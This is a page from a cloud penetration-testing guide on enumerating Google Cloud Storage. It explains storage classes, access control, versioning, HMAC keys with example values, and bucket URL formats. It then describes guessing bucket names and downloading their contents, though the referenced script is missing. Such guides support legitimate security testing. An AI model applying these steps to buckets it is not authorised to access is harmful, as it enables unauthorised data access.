GCP - Storage Enum
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Google Cloud Platform (GCP) Storage is a cloud-based storage solution that provides highly durable and available object storage for unstructured data. It offers various storage classes based on performance, availability, and cost, including Standard, Nearline, Coldline, and Archive. GCP Storage also provides advanced features such as lifecycle policies, versioning, and access control to manage and secure data effectively.
The bucket can be stored in a region, in 2 regions or multi-region (default).
Standard Storage: This is the default storage option that offers high-performance, low-latency access to frequently accessed data. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines.
Nearline Storage: This storage class offers lower storage costs and slightly higher access costs than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes.
Coldline Storage: This storage class is optimized for long-term storage of infrequently accessed data, with a minimum storage duration of 90 days. It offers the lower storage costs than Nearline Storage, but with higher access costs.
Archive Storage: This storage class is designed for cold data that is accessed very infrequently, with a minimum storage duration of 365 days. It offers the lowest storage costs of all GCP storage options but with the highest access costs. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons.
Autoclass: If you don't know how much you are going to access the data you can select Autoclass and GCP will automatically change the type of storage for you to minimize costs.
By default it's recommended to control the access via IAM, but it's also possible to enable the use of ACLs. If you select to only use IAM (default) and 90 days passes, you won't be able to enable ACLs for the bucket.
It's possible to enable versioning, this will save old versions of the file inside the bucket. It's possible to configure the number of versions you want to keep and even how long you want noncurrent versions (old versions) to live. Recommended is 7 days for Standard type.
The metadata of a noncurrent version is kept. Moreover, ACLs of noncurrent versions are also kept, so older versions might have different ACLs from the current version.
Learn more in the docs.
Indicate how long you want to forbid the deletion of Objects inside the bucket (very useful for compliance at least). Only one of versioning or retention policy can be enabled at the same time.
By default objects are encrypted using Google managed keys, but you could also use a key from KMS.
It's possible to give external users (logged in GCP or not) access to buckets content. By default, when a bucket is created, it will have disabled the option to expose publicly the bucket, but with enough permissions the can be changed.
The format of an URL to access a bucket is https://storage.googleapis.com/<bucket-name>
or https://<bucket_name>.storage.googleapis.com
(both are valid).
An HMAC key is a type of credential and can be associated with a service account or a user account in Cloud Storage. You use an HMAC key to create signatures which are then included in requests to Cloud Storage. Signatures show that a given request is authorized by the user or service account.
HMAC keys have two primary pieces, an access ID and a secret.
Access ID: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID:
GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA
Secret: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret:
bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ
Both the access ID and secret uniquely identify an HMAC key, but the secret is much more sensitive information, because it's used to create signatures.
If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them:
With permissions storage.objects.list
and storage.objects.get
, you should be able to enumerate all folders and files from the bucket in order to download them. You can achieve that with this Python script:
In the following page you can check how to abuse storage permissions to escalate privileges:
GCP - Storage PrivescLearn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)